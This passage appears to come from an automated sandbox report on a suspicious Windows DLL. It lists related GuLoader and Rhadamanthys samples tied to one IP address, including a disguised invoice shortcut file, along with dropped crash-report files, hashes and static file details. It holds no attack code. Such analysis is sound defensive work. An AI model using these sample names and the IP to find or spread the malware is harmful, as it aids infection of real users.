                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        INVOICE-0098.pdf ... .lnk.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        YinLHGpoX4.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        tmkSAOF3GM.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                                        • 116.133.8.92

                                                                                                                                                                        Dropped Files

                                                                                                                                                                        No context

                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                        C:\1.txt

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):705
                                                                                                                                                                        Entropy (8bit):4.955986925542614
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:12:8DKH+vSE3epENs4KcGmfQ+n7BR7BR7BR7BR7BR7BR7BR7BR7BA:8DKH+vSaeENs4+mfQ+nPPPPPPPPe
                                                                                                                                                                        MD5:DFE61BB0D430B43C78BB3419DB9B8D8F
                                                                                                                                                                        SHA1:6295EF17BE3B2B74BB898B90304F190257024558
                                                                                                                                                                        SHA-256:B958276D9E19D38BD659B360297BCF17CF450470180F7FE37DC340184E9F0A78
                                                                                                                                                                        SHA-512:92C8EC39407AA396191C6F1AFD7CACC1B18DD36AB02C7089F98AA218E942F95557348A7030983F92D06F4796E9AFB7BB632FE993FCC80A23EE2E648C9A3E7839
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..2024-12-21 22:47..iOffset....2024-12-22 17:35..iOffset....2024-12-23 13:48..iOffset....2024-12-25 07:59..iOffset....2024-12-27 04:45..iOffset....2024-12-28 05:38..iOffset....2024-12-29 07:51..iOffset....2024-12-30 12:29..iOffset....2025-01-02 21:55..iOffset....2025-01-05 07:03..iOffset....2025-01-12 18:44..iOffset....2025-01-23 19:00..iOffset....2025-01-28 23:33..iOffset....2028-03-16 00:51..iOffset....2037-10-12 23:29..iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset....(...(. .B..%...(&x$iOffset..

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_d2d6a05f617930bde2d4c76b2a5555e299272ba9_7522e4b5_3541c327-8460-4f3e-a8e6-dc1b05cbe8dc\Report.wer

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                        Entropy (8bit):0.9509604707388567
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:V8riROTD30BU/wjeTNW6ZYzuiFeZ24IO8dci:gio3EBU/wje57YzuiFeY4IO8dci
                                                                                                                                                                        MD5:9F329C0C19BF17BDE10EB684F0A3A9D2
                                                                                                                                                                        SHA1:56430D514C128A5CF6B941C6E59BD368F1FB03E0
                                                                                                                                                                        SHA-256:BA84140DEE82597C6F5625352BFB1FC425FFB183017A64BCE4E7E3CE9E8930DA
                                                                                                                                                                        SHA-512:E5E817CA1EBAE3FFA0B24D1C1D2BB4236DA0AC8A959D4C6BE3E73348A0C0F5FBB0EAF66A6FBD4378791729721408A66C8FFF0D1B025C20AA404AA14F38E70F35
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.9.3.0.5.3.6.9.3.4.8.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.9.3.0.5.4.0.5.2.8.6.0.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.4.1.c.3.2.7.-.8.4.6.0.-.4.f.3.e.-.a.8.e.6.-.d.c.1.b.0.5.c.b.e.8.d.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.7.3.e.0.f.3.5.-.4.5.3.9.-.4.8.8.d.-.8.2.4.8.-.e.4.0.2.f.b.c.8.4.0.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.0.4.-.0.0.0.1.-.0.0.1.3.-.b.1.f.c.-.8.f.7.8.2.4.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_fee72e296cfe876676a0f903eac30ffbede4e6_7522e4b5_a5c5fc65-7723-4f08-96ee-304caeedbc42\Report.wer

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                        Entropy (8bit):0.9505525066818328
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:crfiOxiOBv0BU/wjeTtW6ZYzuiFeZ24IO8dci:YfiOlBcBU/wjeZ7YzuiFeY4IO8dci
                                                                                                                                                                        MD5:634BD457BCA0C5CCA23D47B314734EDD
                                                                                                                                                                        SHA1:0CC7F75E4648E162E7D4CA95AE75F647509A682F
                                                                                                                                                                        SHA-256:09DEA282FC0BCE1372178604AB7B8B9CF1692384C6180DD9D90381521116ED4B
                                                                                                                                                                        SHA-512:A66B9F949BD5E099EC491C8A1CAFCDEF350463BFD6DEE2F939079C583BB58C6DDB5DF9CC38E2C81872C6238245FDCBA2BF1035437D1382DD7EA9A961010A6470
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.0.9.3.0.5.7.0.1.6.1.9.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.0.9.3.0.5.7.7.3.4.9.3.6.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.5.c.5.f.c.6.5.-.7.7.2.3.-.4.f.0.8.-.9.6.e.e.-.3.0.4.c.a.e.e.d.b.c.4.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.3.b.4.4.9.2.c.-.c.e.4.e.-.4.d.e.1.-.a.8.f.3.-.3.0.d.4.6.5.9.b.8.c.4.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.e.9.4.-.0.0.0.1.-.0.0.1.3.-.f.d.e.5.-.6.5.7.a.2.4.5.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER183F.tmp.dmp

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:44:17 2024, 0x1205a4 type
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):45142
                                                                                                                                                                        Entropy (8bit):2.0268748562150543
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:DtZ8ZwUH5H7yaFFD0yhQkCWL0j97nwhL:03H57rjhQkby7nw
                                                                                                                                                                        MD5:F2FD094B1724695F3005A6C7AB74EE02
                                                                                                                                                                        SHA1:138868ECC618A40E204F5622074797443C02C607
                                                                                                                                                                        SHA-256:2DA85C81AED65F827E04BC83024E578EE7AB84F7935F342EC48B47F1E01DA067
                                                                                                                                                                        SHA-512:3E0A468A5BD128102AC223F55154A031D9C82CF7DFDCB524F74A1336B143F17C9C9BCAEECCF434B706706EBFEBA8910AFBBC82BD421FCFEC24722BCDE9223944
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:MDMP..a..... .......A1dg........................................V/..........T.......8...........T...........................L...........8...............................................................................eJ..............GenuineIntel............T...........@1dg.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A15.tmp.WERInternalMetadata.xml

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):8268
                                                                                                                                                                        Entropy (8bit):3.6913251362383805
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:R6l7wVeJQm6ZO6Y+Q06gdgmfTxqpr/89beOsf0MKm:R6lXJB6g6YT06SgmfTxfeNfJ
                                                                                                                                                                        MD5:B747CF30A54004EAD2A8507D07A3A4EC
                                                                                                                                                                        SHA1:8FD35FF755ECD00A45B7BAB1D2CC6E2B5E1EA92B
                                                                                                                                                                        SHA-256:E329FCE0649BE18790D010DB37D4E4CD07A334670214A32C22B7EBA404C8E607
                                                                                                                                                                        SHA-512:C319E3A167604F8CADF3CCE0D900E99BE70C79EF1E1973E052597FB1DAF6E56974E431F0F37971ED018240FA0ECBD83F85A162760818DCAA9567772BD92B1833
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.7.3.2.<./.P.i.

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A35.tmp.xml

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4654
                                                                                                                                                                        Entropy (8bit):4.4615978525860305
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:cvIwWl8zsMiJg77aI9xWWpW8VYrYm8M4JCdPOFfA+q8/AxRGScSUd:uIjfMwI7b37VXJkJRJ3Ud
                                                                                                                                                                        MD5:6328A58BAB041C58B31DDCAD0649E8D3
                                                                                                                                                                        SHA1:872C1F64F85EDF8F2802404A193E404398272E8F
                                                                                                                                                                        SHA-256:7A9D65C3B79091D2D956EDB718BFC08D65560406FC08EC6E8E19078CFFCAD8CB
                                                                                                                                                                        SHA-512:F16194EF4890D01BE6D2FBB1AD941C14662DB653CF07358682CB279F46A0BF8C39EA321E6D8F707382DD35DD34C581A5CD2BEB3CC624AA86A081571F139565D2
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638266" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB4F.tmp.dmp

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Thu Dec 19 14:44:13 2024, 0x1205a4 type
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):44432
                                                                                                                                                                        Entropy (8bit):2.048976631359992
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:BAsZSZwaXzXClDO5H4qB3Zf3sJWuCr5rn/zi2otEfXyrV:jZSZwp65HLBJf8Jo7/zi2iEc
                                                                                                                                                                        MD5:863EB2E87DFE82D6C4582C0E8295DC8C
                                                                                                                                                                        SHA1:84CC16504FE7EFF2EC5ED0B965A303C7B4DA6A6A
                                                                                                                                                                        SHA-256:61A98BE670C585EAC4DD06237D995E4237A9C0C01993906D5555FDC985D36BA3
                                                                                                                                                                        SHA-512:CC90C557EBA2551269E800BBCAFEB13176C31FDE71880A219B27A92A999A172BC1F3860753D8D3891367930130A481A5A803EF99095BE9DCD70F43FDA970D0A7
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:MDMP..a..... .......=1dg........................................V/..........T.......8...........T..........................L...........8...............................................................................eJ..............GenuineIntel............T...........=1dg.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERC0B.tmp.WERInternalMetadata.xml

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):8272
                                                                                                                                                                        Entropy (8bit):3.691669945211612
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:R6l7wVeJhC626Yuq6mTgmfTZqprt89b6XsfFJv+m:R6lXJU626YD6mTgmfTZ16cfr
                                                                                                                                                                        MD5:E150228A9B17F45AD0190ECE2B40C2FF
                                                                                                                                                                        SHA1:4614967DD1BD5A6591101E514B014E63B8BA3A7C
                                                                                                                                                                        SHA-256:E1316C12B96F39D34A032C3C3EBBEF17CE3E090F426FDC6726DB0978DB5F9CB9
                                                                                                                                                                        SHA-512:B67CD4C4FDBEEE5387EB15350EFF324431F9E678709F95BF2354AAC0789EA374E559609380CA6BA553F1B9565011BDC4A145B02B8F8E66FA444EE0C8264A71F8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.5.6.<./.P.i.

                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERC2C.tmp.xml

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4654
                                                                                                                                                                        Entropy (8bit):4.463136913363345
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:cvIwWl8zsMiJg77aI9xWWpW8VYfYm8M4JCdPSFPMo+q8/A2L2GScS6d:uIjfMwI7b37VjJ3Mo5J36d
                                                                                                                                                                        MD5:AC1E0D303951EB7EDA478ED2A632594A
                                                                                                                                                                        SHA1:C12A59F941F96E6D1EFA2E82517DB15ACBDD942E
                                                                                                                                                                        SHA-256:EB3B7A998C39D0DAD265400211B3F27B925CF64F1E9C7058E55D84A30C9A58F7
                                                                                                                                                                        SHA-512:700E1E085D11A6A86450E3AE81F23A956D3BE383A39AC89414C5AEB4E70B6520D39E42B447AB691BC3747EED97AC29B19EBFA4FE9CF576455D95F397391DD154
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="638266" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):71954
                                                                                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                                                                                        Encrypted:true
                                                                                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                        Entropy (8bit):3.254427469235842
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:kK+eV99UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:VVkDImsLNkPlE99SNxAhUe/3
                                                                                                                                                                        MD5:B5CE53E7E1E29A8A296639027185D75B
                                                                                                                                                                        SHA1:3154E861BF18AA192A509FE406429BC9EA1C9EF6
                                                                                                                                                                        SHA-256:2861363EAC4547FE5C7E369A4D2959997404916FA4EE4B37D0964B97B4E26E69
                                                                                                                                                                        SHA-512:37CF38D607BA3A28F2DA31ACF9CA570F949C46D7A75C770BAE57220DC3C1843C993C2F229826805257E8B1B2E92B1FD4ADEF96BF15CC7FF9F5F3A822F604823C
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:p...... ..............(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                                                                                                                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                        Download File
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1835008
                                                                                                                                                                        Entropy (8bit):4.2988432393311555
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6144:dECqOEmWfd+WQFHy/9026ZTyaRsCDusBqD5dooi8lASD6VJSRrf:aCsL6seqD5SlSWVARD
                                                                                                                                                                        MD5:D82D81E189FFDC8A8127BD98FBDBB842
                                                                                                                                                                        SHA1:E0F5764738AB07065E9EDBEE539B40C6C0363C49
                                                                                                                                                                        SHA-256:A21E68F33CDAC2E8B94EB3253A90BF1707DD4056F09AF38F38A8CB5AC0623551
                                                                                                                                                                        SHA-512:B116A830C2E9B98AE2FA8C19562C4C6E90CAC7CD3993B633477932ECC2A629BA408AD06AD114ED8B183EC3F866AD36A6D1C8E0D5FE591C7E03EFF1BC06A4BBC0
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:regfD...D....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...x$R..............................................................................................................................................................................................................................................................................................................................................8..L........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                        Static File Info

                                                                                                                                                                        General

                                                                                                                                                                        File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                        Entropy (8bit):7.738266496763094
                                                                                                                                                                        TrID:
                                                                                                                                                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                        File name:2JSGOlbNym.dll
                                                                                                                                                                        File size:204'859 bytes
                                                                                                                                                                        MD5:e3f13188806c9a2ecabf5eab0cf7dc5f
                                                                                                                                                                        SHA1:bc3a8653c59edabf91eb545f7d9dcf818f3ef003
                                                                                                                                                                        SHA256:ad2003c10fcffe449f3b5bd445dca19d789eac82d64f0b764104d7b6d0fb955f
                                                                                                                                                                        SHA512:261711f8b6b002ac344c84afe01e38b4900ac3aae03da16ab049ac39e0c2fd8278bf95e8c53e25e825bcd0938d0b5dad3de584b5f65300fabedd4d3c2a677f0f
